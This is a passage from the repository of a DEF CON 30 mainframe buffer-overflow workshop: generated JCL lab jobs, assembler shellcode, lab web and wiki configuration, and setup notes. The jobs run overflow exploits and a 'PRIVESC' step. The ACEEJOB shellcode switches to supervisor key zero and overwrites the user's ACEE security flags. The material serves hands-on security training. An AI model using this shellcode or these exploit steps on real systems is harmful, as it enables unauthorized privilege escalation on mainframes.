DD DISP=SHR,DSN={usern}.LOAD 147 | //SYSUDUMP DD DISP=SHR,DSN={usern}.DUMP001 148 | ./ ADD NAME=LAB03,LIST=ALL 149 | //{usern}LAB3 JOB (TSO), 150 | // 'LOCATE Run', 151 | // CLASS=A, 152 | // MSGCLASS=H, 153 | // MSGLEVEL=(1,1),NOTIFY=&SYSUID 154 | //RUN EXEC PGM=HELLO,REGION=0M 155 | //SYSPRINT DD SYSOUT=* 156 | //STDOUT DD SYSOUT=A 157 | //STDIN DD DISP=SHR,DSN={usern}.OVERFLOW(LOC400) 158 | //STEPLIB DD DISP=SHR,DSN={usern}.LOAD 159 | //SYSUDUMP DD DISP=SHR,DSN={usern}.DUMP002 160 | ./ ADD NAME=LAB04,LIST=ALL 161 | //{usern}LAB4 JOB (TSO),'EXPLOIT Run',CLASS=A,MSGCLASS=H, 162 | // MSGLEVEL=(1,1),NOTIFY=&SYSUID 163 | //RUN EXEC PGM=HELLO,REGION=0M 164 | //SYSPRINT DD SYSOUT=* 165 | //STDOUT DD SYSOUT=* 166 | //STDIN DD DISP=SHR,DSN={usern}.OVERFLOW(WTO400) 167 | //STEPLIB DD DISP=SHR,DSN={usern}.LOAD 168 | //SYSUDUMP DD SYSOUT=* 169 | ./ ADD NAME=LAB05,LIST=ALL 170 | //{usern}LAB5 JOB (TSO), 171 | // 'RUN OPENTEST', 172 | // CLASS=A, 173 | // MSGCLASS=H, 174 | // MSGLEVEL=(2,1), 175 | // REGION=0K, 176 | // NOTIFY=&SYSUID 177 | //OPENTST EXEC PGM=OPENTST 178 | //SYSPRINT DD SYSOUT=A 179 | //STEPLIB DD DISP=SHR,DSN=SYSC.LINKLIB 180 | //SYSUDUMP DD DISP=SHR,DSN={usern}.DUMP003 181 | //INPUTDD DD * 182 | 183 | //* 184 | ./ ADD NAME=LAB06,LIST=ALL 185 | //{usern}LAB6 JOB (TSO), 186 | // 'DEBRUIJN PATTERN', 187 | // CLASS=A, 188 | // MSGCLASS=H, 189 | // MSGLEVEL=(2,1), 190 | // REGION=0K, 191 | // NOTIFY=&SYSUID 192 | //OPENTST EXEC PGM=IKJEFT01 193 | //SYSTSPRT DD SYSOUT=* 194 | //STDOUT DD DISP=SHR,DSN={usern}.OVERFLOW.ARBAUTH(DEBRUIJN) 195 | //SYSTSIN DD * 196 | RX '{usern}.EXEC(DEBRUIJN)' '1000' 197 | //* 198 | ./ ADD NAME=LAB07,LIST=ALL 199 | //{usern}LAB7 JOB (TSO), 200 | // 'HACK OPENTEST', 201 | // CLASS=A, 202 | // MSGCLASS=H, 203 | // MSGLEVEL=(2,1), 204 | // REGION=0K, 205 | // NOTIFY=&SYSUID 206 | //OPENTST EXEC PGM=OPENTST 207 | //SYSPRINT DD SYSOUT=* 208 | //STEPLIB DD DISP=SHR,DSN=SYSC.LINKLIB 209 | //SYSUDUMP DD DISP=SHR,DSN={usern}.DUMP003 210 | //INPUTDD DD DISP=SHR,DSN={usern}.OVERFLOW.ARBAUTH(DEBRUIJN) 211 | ./ ADD NAME=LAB08,LIST=ALL 212 | //{usern}LAB8 JOB (TSO), 213 | // 'COMP WTOPOC', 214 | // CLASS=A, 215 | // MSGCLASS=H, 216 | // MSGLEVEL=(2,1), 217 | // REGION=0K, 218 | // NOTIFY=&SYSUID 219 | //ASMLKD1 EXEC ASMFCL, 220 | // PARM.ASM='OBJECT,NODECK,TERM,XREF(SHORT)', 221 | // PARM.LKED='LET,MAP,XREF,LIST,TEST' 222 | //ASM.SYSLIB DD DSN=SYS1.MACLIB,DISP=SHR 223 | // DD DSN=SYS2.MACLIB,DISP=SHR 224 | // DD DSN=SYS1.AMODGEN,DISP=SHR 225 | // DD DSN=SYS1.AMACLIB,DISP=SHR 226 | //ASM.SYSTERM DD SYSOUT=* 227 | //ASM.SYSTERM DD SYSOUT=* 228 | //ASM.SYSIN DD *,DLM=@@ 229 | WTOPOC CSECT 230 | * 231 | * PREFIX TO SIMULATE R14 RETURN 232 | * 233 | LR R14,R15 234 | LA R14,16(R14) 235 | BC 15,0(,R14) 236 | NOPR 0 237 | EYE4 DC XL4'CAFEBABE' 238 | USING *,R12 239 | * 240 | * WTO AND THEN EXIT 241 | * 242 | COPY LR R12,R14 243 | LA R1,MSGWTO 244 | SVC 35 245 | SVC 03 246 | MSGWTO DC XL4'00100000' 247 | DC C'WTO HAS RUN!' 248 | EYE1 DC XL4'CAFEBABE' 249 | YREGS 250 | END WTOPOC CSECT 251 | @@ 252 | //LKED.SYSLMOD DD DSN={usern}.LOAD(WTOPOC),DISP=SHR 253 | //LKED.SYSPRINT DD SYSOUT=* 254 | ./ ADD NAME=LAB09,LIST=ALL 255 | //{usern}LAB9 JOB (TSO), 256 | // 'RUN ARBAUTH', 257 | // CLASS=A, 258 | // MSGCLASS=H, 259 | // MSGLEVEL=(2,1), 260 | // REGION=0K, 261 | // NOTIFY=&SYSUID 262 | //ARBAUTH EXEC PGM=ARBAUTH, 263 | // PARM='IEFBR14 ' 264 | //SYSPRINT DD SYSOUT=* 265 | //STEPLIB DD DISP=SHR,DSN=SYS2.LINKLIB 266 | // DD DISP=SHR,DSN=SYSC.LINKLIB 267 | //SYSUDUMP DD SYSOUT=* 268 | ./ ADD NAME=LAB10,LIST=ALL 269 | //{usern}LB10 JOB (TSO), 270 | // 'Exploit ARBAUTH', 271 | // CLASS=A, 272 | // MSGCLASS=H, 273 | // MSGLEVEL=(2,1), 274 | // REGION=0K, 275 | // NOTIFY=&SYSUID 276 | //ARBAUTH EXEC PGM=ARBAUTH, 277 | // PARM='OPENTST ' 278 | //SYSPRINT DD SYSOUT=A 279 | //STEPLIB DD DISP=SHR,DSN=SYS2.LINKLIB 280 | // DD DISP=SHR,DSN=SYSC.LINKLIB 281 | //SYSUDUMP DD DISP=SHR,DSN={usern}.DUMP004 282 | //INPUTDD DD DISP=SHR,DSN={usern}.OVERFLOW.ARBAUTH(SHELCODE) 283 | ./ ADD NAME=LAB11,LIST=ALL 284 | //{usern}LB11 JOB (TSO), 285 | // 'COMP ACEEJOB', 286 | // CLASS=A, 287 | // MSGCLASS=H, 288 | // MSGLEVEL=(2,1), 289 | // REGION=0K, 290 | // NOTIFY=&SYSUID 291 | //ASMLKD1 EXEC ASMFCL, 292 | // PARM.ASM='OBJECT,NODECK,TERM,XREF(SHORT)', 293 | // PARM.LKED='LET,MAP,XREF,LIST,TEST' 294 | //ASM.SYSLIB DD DSN=SYS1.MACLIB,DISP=SHR 295 | // DD DSN=SYS2.MACLIB,DISP=SHR 296 | // DD DSN=SYS1.AMODGEN,DISP=SHR 297 | // DD DSN=SYS1.AMACLIB,DISP=SHR 298 | //ASM.SYSTERM DD SYSOUT=* 299 | //ASM.SYSTERM DD SYSOUT=* 300 | //ASM.SYSIN DD DATA,DLM=@@ 301 | ACEEJOB CSECT 302 | * 303 | * PREFIX TO SIMULATE R14 RETURN 304 | * 305 | LR R14,R15 306 | LA R14,16(R14) 307 | BC 15,0(,R14) 308 | NOPR 0 309 | EYE4 DC XL4'CAFEBABE' 310 | USING *,R12 311 | * 312 | * ENTER KEY ZERO 313 | * 314 | COPY LR R12,R14 315 | LA R1,60 316 | * MODESET KEY=ZERO,MODE=SUP 317 | SVC 107 318 | * 319 | * LOAD ACEE 320 | * 321 | L R5,X'224' POINTER TO ASCB 322 | L R5,X'6C'(R5) POINTER TO ASXB 323 | L R5,X'C8'(R5) POINTER TO ACEE 324 | * 325 | * WRITE ACEE 326 | * 327 | NI X'26'(R5),X'00' 328 | OI X'26'(R5),X'B1' 329 | * 330 | * EXIT 331 | * 332 | LA R1,MSGCOMPL 333 | SVC 35 334 | SVC 03 335 | MSGCOMPL DC XL4'00140000' 336 | DC C'WRITING COMPLETE' 337 | EYE1 DC XL4'CAFEBABE' 338 | YREGS 339 | END 340 | @@ 341 | //LKED.SYSLMOD DD DSN={usern}.LOAD(ACEEJOB),DISP=SHR 342 | //LKED.SYSPRINT DD SYSOUT=* 343 | ./ ADD NAME=LAB12,LIST=ALL 344 | //{usern}LB12 JOB (TSO), 345 | // 'PRIVESC', 346 | // CLASS=A, 347 | // MSGCLASS=H, 348 | // MSGLEVEL=(2,1), 349 | // REGION=0K, 350 | // NOTIFY=&SYSUID 351 | //ARBAUTH EXEC PGM=ARBAUTH, 352 | // PARM='OPENTST ' 353 | //SYSPRINT DD SYSOUT=* 354 | //STEPLIB DD DISP=SHR,DSN=SYS2.LINKLIB 355 | // DD DISP=SHR,DSN=SYSC.LINKLIB 356 | //SYSUDUMP DD DISP=SHR,DSN={usern}.DUMP004 357 | //INPUTDD DD DISP=SHR,DSN={usern}.OVERFLOW.ARBAUTH(PRIVESC) 358 | //STEP01 EXEC PGM=IEBGENER,COND=EVEN 359 | //SYSPRINT DD SYSOUT=* 360 | //SYSIN DD DUMMY 361 | //SYSUT1 DD DSN=WHITE.RABBIT(SCRIPT),DISP=SHR 362 | //SYSUT2 DD SYSOUT=* 363 | //SYSTSPRT DD SYSOUT=* 364 | ./ ADD NAME=LAB13,LIST=ALL 365 | //{usern}LB13 JOB (TSO), 366 | // 'COMP WTOSML', 367 | // CLASS=A, 368 | // MSGCLASS=H, 369 | // MSGLEVEL=(2,1), 370 | // REGION=0K, 371 | // NOTIFY=&SYSUID 372 | //ASMLKD1 EXEC ASMFCL, 373 | // PARM.ASM='OBJECT,NODECK,TERM,XREF(SHORT)', 374 | // PARM.LKED='LET,MAP,XREF,LIST,TEST' 375 | //ASM.SYSLIB DD DSN=SYS1.MACLIB,DISP=SHR 376 | // DD DSN=SYS2.MACLIB,DISP=SHR 377 | // DD DSN=SYS1.AMODGEN,DISP=SHR 378 | // DD DSN=SYS1.AMACLIB,DISP=SHR 379 | //ASM.SYSTERM DD SYSOUT=* 380 | //ASM.SYSTERM DD SYSOUT=* 381 | //ASM.SYSIN DD DATA,DLM=@@ 382 | WTOSML CSECT 383 | * 384 | * PREFIX TO SIMULATE R14 RETURN 385 | * 386 | LR R14,R15 387 | LA R14,16(R14) 388 | BC 15,6(,R14) 389 | NOPR 0 390 | EYE4 DC XL4'CAFEBABE' 391 | USING *,R14 392 | * 393 | * WTO AND THEN EXIT 394 | * 395 | DS XL6 396 | COPY LA R1,MSGWTO 397 | SVC 35 398 | SVC 03 399 | MSGWTO DC XL4'000C0000' 400 | DC C'RINGRING' 401 | EYE1 DC XL4'CAFEBABE' 402 | YREGS 403 | END 404 | @@ 405 | //LKED.SYSLMOD DD DSN={usern}.LOAD(WTOSML),DISP=SHR 406 | //LKED.SYSPRINT DD SYSOUT=* 407 | ./ ADD NAME=LAB14,LIST=ALL 408 | //{usern}LB14 JOB (TSO), 409 | // 'COMP WTOSML', 410 | // CLASS=A, 411 | // MSGCLASS=H, 412 | // MSGLEVEL=(2,1), 413 | // REGION=0K, 414 | // NOTIFY=&SYSUID 415 | //ASMLKD1 EXEC ASMFCL, 416 | // PARM.ASM='OBJECT,NODECK,TERM,XREF(SHORT)', 417 | // PARM.LKED='LET,MAP,XREF,LIST,TEST' 418 | //ASM.SYSLIB DD DSN=SYS1.MACLIB,DISP=SHR 419 | // DD DSN=SYS2.MACLIB,DISP=SHR 420 | // DD DSN=SYS1.AMODGEN,DISP=SHR 421 | // DD DSN=SYS1.AMACLIB,DISP=SHR 422 | //ASM.SYSTERM DD SYSOUT=* 423 | //ASM.SYSTERM DD SYSOUT=* 424 | //ASM.SYSIN DD DATA,DLM=@@ 425 | AWTOXOR CSECT 426 | * 427 | * PREFIX TO SIMULATE R14 RETURN 428 | * 429 | LR R14,R15 430 | LA R14,16(R14) 431 | BC 15,0(,R14) 432 | NOPR 0 433 | EYE4 DC XL4'CAFEBABE' 434 | USING *,R14 435 | * 436 | * ENTER XOR BYTES 437 | * 438 | COPY XC WTOJOBX,XORKEY 439 | * 440 | * WTOSML XORED 441 | * USING *,R14 442 | * DS XL6 443 | * LA R1,MSGWTO 444 | * SVC 35 445 | * SVC 03 446 | * DC XL4'00070000' 447 | * DC C'WTO' 448 | * 449 | WTOJOBX DS 0XL21 450 | DC X'' 451 | * 452 | * XOR KEY 453 | * 454 | XORKEY DS 0XL21 455 | DC X'' 456 | EYE1 DC XL4'CAFEBABE' 457 | YREGS 458 | END 459 | @@ 460 | //LKED.SYSLMOD DD DSN={usern}.LOAD(WTOSMLX),DISP=SHR 461 | //LKED.SYSPRINT DD SYSOUT=* 462 | ./ ADD NAME=BONUS01,LIST=ALL 463 | //BONUS01 JOB (TSO), 464 | // 'RUN FIXDSCB', 465 | // CLASS=A, 466 | // MSGCLASS=H, 467 | // MSGLEVEL=(1,1), 468 | // REGION=0K 469 | //FIXDSCB EXEC PGM=FIXDSCB 470 | //SYSPRINT DD SYSOUT=A 471 | //STEPLIB DD DISP=SHR,DSN=SYSC.LINKLIB 472 | //SYSIN DD * 473 | EXTEND VOLUME=MVSRES,DSNAME=SYS1.LINKLIB 474 | //* 475 | $$ 476 | ''') 477 | 478 | for x in range(0,23): 479 | with open("users/DC{}.jcl".format(str(x).zfill(2)), 'w') as jclfile: 480 | print("*** Writting users/DC{}.jcl".format(str(x).zfill(2))) 481 | jclfile.write(USERJOB.format(usern="DC{}".format(str(x).zfill(2)))) 482 | 483 | -------------------------------------------------------------------------------- /vtam_screen.ans: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/vtam_screen.ans -------------------------------------------------------------------------------- /web3270.ini: -------------------------------------------------------------------------------- 1 | [tn3270] 2 | ;web3270 config file 3 | server_ip = 127.0.0.1 4 | server_port = 3270 5 | ; should the connection be encrypted 6 | encrypted = no 7 | ; enables -noverifycert 8 | selfsignedcert = no 9 | ; tn3270 model type 10 | model = 4 11 | ; to use proxies change below to yes and uncomment the proxystring 12 | ; and adjust as needed 13 | useproxy = no 14 | ;proxystring = socks5d:fred:secret@localhost:12345 15 | 16 | [web] 17 | webport = 8443 18 | tls = yes 19 | ; use this to set a password required to access the web app 20 | ; if this line is uncommented no password is required 21 | password = D3FC0N 22 | ; This is used for secure cookies. If you do not set one 23 | ; this script will set one for you 24 | secret = -------------------------------------------------------------------------------- /wiki/start_tiddlywiki.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | set -e 3 | 4 | cd /var/lib/tiddlywiki 5 | 6 | tiddlywiki_script=$(readlink -f $(which tiddlywiki)) 7 | 8 | if [ -n "$NODE_MEM" ]; then 9 | # Based on rule of thumb from: 10 | # http://fiznool.com/blog/2016/10/01/running-a-node-dot-js-app-in-a-low-memory-environment/ 11 | mem_node_old_space=$((($NODE_MEM*4)/5)) 12 | NODEJS_V8_ARGS="--max_old_space_size=$mem_node_old_space $NODEJS_V8_ARGS" 13 | fi 14 | 15 | if [ ! -d /var/lib/tiddlywiki/mywiki ]; then 16 | /usr/bin/env node $NODEJS_V8_ARGS $tiddlywiki_script mywiki --init server 17 | 18 | mkdir /var/lib/tiddlywiki/mywiki/tiddlers 19 | fi 20 | 21 | # Configure listen command, see https://tiddlywiki.com/static/ListenCommand.html 22 | listen_params="host=0.0.0.0 port=8080" 23 | listen_params="$listen_params debug-level=${DEBUG_LEVEL-none}" 24 | 25 | if [ -n "$PATH_PREFIX" ]; then 26 | listen_params="$listen_params path-prefix=$PATH_PREFIX" 27 | fi 28 | 29 | if [ -n "$USERNAME" ]; then 30 | listen_params="$listen_params username=$USERNAME" 31 | listen_params="$listen_params password=${PASSWORD-wiki}" 32 | fi 33 | 34 | if [ -n "$CLASS" ]; then 35 | listen_params="$listen_params credentials=/auth/users.txt readers=defcon writers=phil,jake" 36 | fi 37 | 38 | # Start the tiddlywiki server 39 | exec /usr/bin/env node $NODEJS_V8_ARGS $tiddlywiki_script mywiki --listen $listen_params -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/$__DefaultTiddlers.tid: -------------------------------------------------------------------------------- 1 | created: 20220731225500219 2 | modified: 20220805061145182 3 | title: $:/DefaultTiddlers 4 | type: text/vnd.tiddlywiki 5 | 6 | [[Welcome DEF CON 30!]] 7 | [[Getting Started]] 8 | [[Lab 1 - Run HELLO]] 9 | [[Lab 2 - First Overflow]] 10 | [[Lab 3 - Find our return address]] 11 | [[Lab 4 - Exploit!]] 12 | [[Lab 5 - OPENTST]] 13 | [[Lab 6 - De Brujin]] 14 | [[Lab 7 - De Brujin Overflow]] 15 | [[Lab 8 - Add our own Shell Code]] 16 | [[Lab 9 - Privesc with ARBAUTH]] 17 | [[Lab 10 - FTP Buffer Overflow]] 18 | [[Lab 11 - 2 Crash 2 Furious]] 19 | [[Lab 12 - Hackers Returns]] 20 | [[Lab 13 - Not So Fast There]] 21 | [[Lab 14 - Sockets and EBCDIC]] 22 | [[Lab 15 - RCE]] 23 | [[ASCII/EBCDIC Table]] 24 | -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/$__Import.tid: -------------------------------------------------------------------------------- 1 | created: 20220804225613332 2 | modified: 20220804225613332 3 | status: complete 4 | title: $:/Import 5 | type: text/vnd.tiddlywiki 6 | 7 | The following tiddlers were imported: 8 | 9 | # [[title.jpg]] -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/$__SiteSubtitle.tid: -------------------------------------------------------------------------------- 1 | created: 20220724190232011 2 | modified: 20220801071843171 3 | title: $:/SiteSubtitle 4 | type: text/vnd.tiddlywiki 5 | 6 | A DEFCON 30 Workshop -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/$__SiteTitle.tid: -------------------------------------------------------------------------------- 1 | created: 20220724190215134 2 | modified: 20220801071843192 3 | title: $:/SiteTitle 4 | type: text/vnd.tiddlywiki 5 | 6 | Mainframe Buffer Overflows -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/$__StoryList.tid: -------------------------------------------------------------------------------- 1 | created: 20220805232041997 2 | list: [[Welcome DEF CON 30!]] [[Getting Started]] [[Lab 1 - Run HELLO]] [[Lab 2 - First Overflow]] [[Lab 3 - Find our return address]] [[Lab 4 - Exploit!]] [[Lab 5 - OPENTST]] [[Lab 6 - De Brujin]] [[Lab 7 - De Brujin Overflow]] [[Lab 8 - Add our own Shell Code]] [[Lab 9 - Privesc with ARBAUTH]] [[Lab 10 - FTP Buffer Overflow]] [[Lab 11 - 2 Crash 2 Furious]] [[Lab 12 - Hackers Returns]] [[Lab 13 - Not So Fast There]] [[Lab 14 - Sockets and EBCDIC]] [[Lab 15 - RCE]] [[ASCII/EBCDIC Table]] 3 | modified: 20220805232041997 4 | title: $:/StoryList 5 | type: text/vnd.tiddlywiki -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/$__config_PageControlButtons_Visibility_$__core_ui_Buttons_control-panel.tid: -------------------------------------------------------------------------------- 1 | created: 20220804232957942 2 | modified: 20220805060101023 3 | title: $:/config/PageControlButtons/Visibility/$:/core/ui/Buttons/control-panel 4 | type: text/vnd.tiddlywiki 5 | 6 | show -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/$__config_PageControlButtons_Visibility_$__core_ui_Buttons_export-page.tid: -------------------------------------------------------------------------------- 1 | created: 20220804233021302 2 | modified: 20220804233021315 3 | title: $:/config/PageControlButtons/Visibility/$:/core/ui/Buttons/export-page 4 | type: text/vnd.tiddlywiki 5 | 6 | show -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/$__config_PageControlButtons_Visibility_$__core_ui_Buttons_home.tid: -------------------------------------------------------------------------------- 1 | created: 20220724193626605 2 | modified: 20220801071842567 3 | title: $:/config/PageControlButtons/Visibility/$:/core/ui/Buttons/home 4 | type: text/vnd.tiddlywiki 5 | 6 | show -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/$__config_PageControlButtons_Visibility_$__core_ui_Buttons_import.tid: -------------------------------------------------------------------------------- 1 | created: 20220724193816629 2 | modified: 20220804232956803 3 | title: $:/config/PageControlButtons/Visibility/$:/core/ui/Buttons/import 4 | type: text/vnd.tiddlywiki 5 | 6 | hide -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/$__config_PageControlButtons_Visibility_$__core_ui_Buttons_new-image.tid: -------------------------------------------------------------------------------- 1 | created: 20220724193606623 2 | modified: 20220801071842633 3 | title: $:/config/PageControlButtons/Visibility/$:/core/ui/Buttons/new-image 4 | type: text/vnd.tiddlywiki 5 | 6 | hide -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/$__config_PageControlButtons_Visibility_$__core_ui_Buttons_new-tiddler.tid: -------------------------------------------------------------------------------- 1 | created: 20220804232955309 2 | modified: 20220804232955327 3 | title: $:/config/PageControlButtons/Visibility/$:/core/ui/Buttons/new-tiddler 4 | type: text/vnd.tiddlywiki 5 | 6 | hide -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/$__config_PageControlButtons_Visibility_$__core_ui_Buttons_theme.tid: -------------------------------------------------------------------------------- 1 | created: 20220724193641332 2 | modified: 20220804233005533 3 | title: $:/config/PageControlButtons/Visibility/$:/core/ui/Buttons/theme 4 | type: text/vnd.tiddlywiki 5 | 6 | hide -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/$__themes_tiddlywiki_vanilla_metrics_storyright.tid: -------------------------------------------------------------------------------- 1 | created: 20220731225332922 2 | modified: 20220801071843220 3 | title: $:/themes/tiddlywiki/vanilla/metrics/storyright 4 | type: text/vnd.tiddlywiki 5 | 6 | px -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/$__themes_tiddlywiki_vanilla_metrics_storywidth.tid: -------------------------------------------------------------------------------- 1 | created: 20220731225339508 2 | modified: 20220804225756730 3 | title: $:/themes/tiddlywiki/vanilla/metrics/storywidth 4 | type: text/vnd.tiddlywiki 5 | 6 | 900px -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/$__themes_tiddlywiki_vanilla_metrics_tiddlerwidth.tid: -------------------------------------------------------------------------------- 1 | created: 20220731225227294 2 | modified: 20220804225759740 3 | title: $:/themes/tiddlywiki/vanilla/metrics/tiddlerwidth 4 | type: text/vnd.tiddlywiki 5 | 6 | 900px -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/ASCII_EBCDIC Table.tid: -------------------------------------------------------------------------------- 1 | created: 20220804215340636 2 | modified: 20220804215354837 3 | tags: 4 | title: ASCII/EBCDIC Table 5 | type: text/vnd.tiddlywiki 6 | 7 | ``` 8 | ASCII Entries: 254 EBCDIC Entries: 254 9 | ascii : 01 02 03 04 05 06 07 08 09 0B 0C 0D 0E 0F 10 11 10 | ebcdic: 01 02 03 37 2D 2E 2F 16 05 0B 0C 0D 0E 0F 10 11 11 | 12 | ascii : 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 13 | ebcdic: 12 13 3C 3D 32 26 18 19 3F 27 1C 1D 1E 1F 40 5A 14 | 15 | ascii : 22 23 24 25 26 27 28 29 2A 2B 2C 2D 2E 2F 30 31 16 | ebcdic: 7F 7B 5B 6C 50 7D 4D 5D 5C 4E 6B 60 4B 61 F0 F1 17 | 18 | ascii : 32 33 34 35 36 37 38 39 3A 3B 3C 3D 3E 3F 40 41 19 | ebcdic: F2 F3 F4 F5 F6 F7 F8 F9 7A 5E 4C 7E 6E 6F 7C C1 20 | 21 | ascii : 42 43 44 45 46 47 48 49 4A 4B 4C 4D 4E 4F 50 51 22 | ebcdic: C2 C3 C4 C5 C6 C7 C8 C9 D1 D2 D3 D4 D5 D6 D7 D8 23 | 24 | ascii : 52 53 54 55 56 57 58 59 5A 5B 5C 5D 5E 5F 60 61 25 | ebcdic: D9 E2 E3 E4 E5 E6 E7 E8 E9 AD E0 BD 5F 6D 79 81 26 | 27 | ascii : 62 63 64 65 66 67 68 69 6A 6B 6C 6D 6E 6F 70 71 28 | ebcdic: 82 83 84 85 86 87 88 89 91 92 93 94 95 96 97 98 29 | 30 | ascii : 72 73 74 75 76 77 78 79 7A 7B 7C 7D 7E 7F 80 81 31 | ebcdic: 99 A2 A3 A4 A5 A6 A7 A8 A9 C0 4F D0 A1 07 20 21 32 | 33 | ascii : 82 83 84 85 86 87 88 89 8A 8B 8C 8D 8E 8F 90 91 34 | ebcdic: 22 23 24 25 06 17 28 29 2A 2B 2C 09 0A 1B 30 31 35 | 36 | ascii : 92 93 94 95 96 97 98 99 9A 9B 9C 9D 9E 9F A0 A1 37 | ebcdic: 1A 33 34 35 36 08 38 39 3A 3B 04 14 3E FF 41 AA 38 | 39 | ascii : A2 A3 A4 A5 A6 A7 A8 A9 AA AB AC AD AE AF B0 B1 40 | ebcdic: 4A B1 9F B2 6A B5 BB B4 9A 8A B0 CA AF BC 90 8F 41 | 42 | ascii : B2 B3 B4 B5 B6 B7 B8 B9 BA BB BC BD BE BF C0 C1 43 | ebcdic: EA FA BE A0 B6 B3 9D DA 9B 8B B7 B8 B9 AB 64 65 44 | 45 | ascii : C2 C3 C4 C5 C6 C7 C8 C9 CA CB CC CD CE CF D0 D1 46 | ebcdic: 62 66 63 67 9E 68 74 71 72 73 78 75 76 77 AC 69 47 | 48 | ascii : D2 D3 D4 D5 D6 D7 D8 D9 DA DB DC DD DE DF E0 E1 49 | ebcdic: ED EE EB EF EC BF 80 FD FE FB FC BA AE 59 44 45 50 | 51 | ascii : E2 E3 E4 E5 E6 E7 E8 E9 EA EB EC ED EE EF F0 F1 52 | ebcdic: 42 46 43 47 9C 48 54 51 52 53 58 55 56 57 8C 49 53 | 54 | ascii : F2 F3 F4 F5 F6 F7 F8 F9 FA FB FC FD FE FF 55 | ebcdic: CD CE CB CF CC E1 70 DD DE DB DC 8D 8E DF 56 | ``` -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Getting Started.tid: -------------------------------------------------------------------------------- 1 | created: 20220724190305762 2 | modified: 20220805061237307 3 | tags: 4 | title: Getting Started 5 | type: text/vnd.tiddlywiki 6 | 7 | !! Labs Docker Container 8 | 9 | If you're not in the DEF CON 30 workshop you will have to run these labs yourself in Docker. The command below will deploy the container for you: 10 | 11 | This is a minimal container, with the least amount of ports/volumes. This is all you'll need for the class. 12 | 13 | ``` 14 | docker run -d \ 15 | --name=defcon30 \ 16 | -e HUSER=defcon \ 17 | -e HPASS=defcon \ 18 | -p 2323:3223 \ 19 | -p 8888:8888 \ 20 | -p 2121-2141:2121-2141 \ 21 | -p 8443:8443 \ 22 | -p 8080:8080 \ 23 | -p 31337-31347:31337-31347 \ 24 | -v ~/dumps:/printers \ 25 | --restart unless-stopped \ 26 | mainframed767/defcon30:prerelease 27 | ``` 28 | 29 | Ports explained: 30 | 31 | * 2323: 3270 server port 32 | * 8443: Web based tn3270 client, the secret is `D3FC0N` 33 | * 8888: Hercules console web server. Username/password: `defcon` 34 | * 8080: This wiki 35 | * 2121-2141 & 31337-31347: Range of web ports for FTP server 36 | 37 | For more information about the container see https://github.com/mainframed/DC30_Workshop 38 | 39 | !! Notes 40 | 41 | * If you want to keep a copy of this wiki locally you can click the ''Export'' button to save a copy locally (its next to the home button) 42 | * If you accidentally close a page, clicking the home page will bring them all back 43 | 44 | !! Logging On 45 | 46 | Either connect to web3270 at https://localhost:8443 or https://dc30.soldieroffortran.org:8443, the secret is `D3FC0N`, or with your own 3270 client (x3270, c3270 and pw3270 are all great open source clients). If using your own client the TN3270 server port is ''2323'': `x3270 -noverifycert L:localhost:2323` 47 | 48 | If you encounter a screen like this: 49 | 50 | [img[Screenshot_2022-07-24_12-32-18.png]] 51 | 52 | It tells you to `CLEAR` the screen. Do to that in web3270 (and x3270/c3270) You click on `Keyboard` and click `CLEAR`: 53 | 54 | [img[Screenshot_2022-07-24_12-32-44.png]] 55 | 56 | Afterwards you should see 57 | 58 | [img[Screenshot_2022-07-24_12-41-23.png]] 59 | 60 | To log on enter your username, which is in the range `DC00` through `DC22`. The password is the same as the username. If you would like to change your password. After logging in you type: `LOGON username/current password/new password`. For example if I was using `DC23` I would type `LOGON DC23/DC23/D3FC0N22` 61 | 62 | Once logged on you'll be at the TSO ready prompt and are good to go. 63 | 64 | -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Joblogheader.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Joblogheader.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Joblogheader.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805063719063 2 | modified: 20220805063719063 3 | title: Joblogheader.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/LAB6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/LAB6.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/LAB6.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805071313633 2 | modified: 20220805071313633 3 | title: LAB6.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Lab 1 - Run HELLO.tid: -------------------------------------------------------------------------------- 1 | created: 20220730162917572 2 | modified: 20220805063726803 3 | tags: 4 | title: Lab 1 - Run HELLO 5 | type: text/vnd.tiddlywiki 6 | 7 | !! Log in and launch ISPF 8 | 9 | If running the workshop container locally use one of: 10 | 11 | * https://localhost:8443 (The secret is `D3FC0N`) 12 | * `x3270 -noverifycert L:localhost:2323` 13 | 14 | Otherwise you can connect to the class workshop: 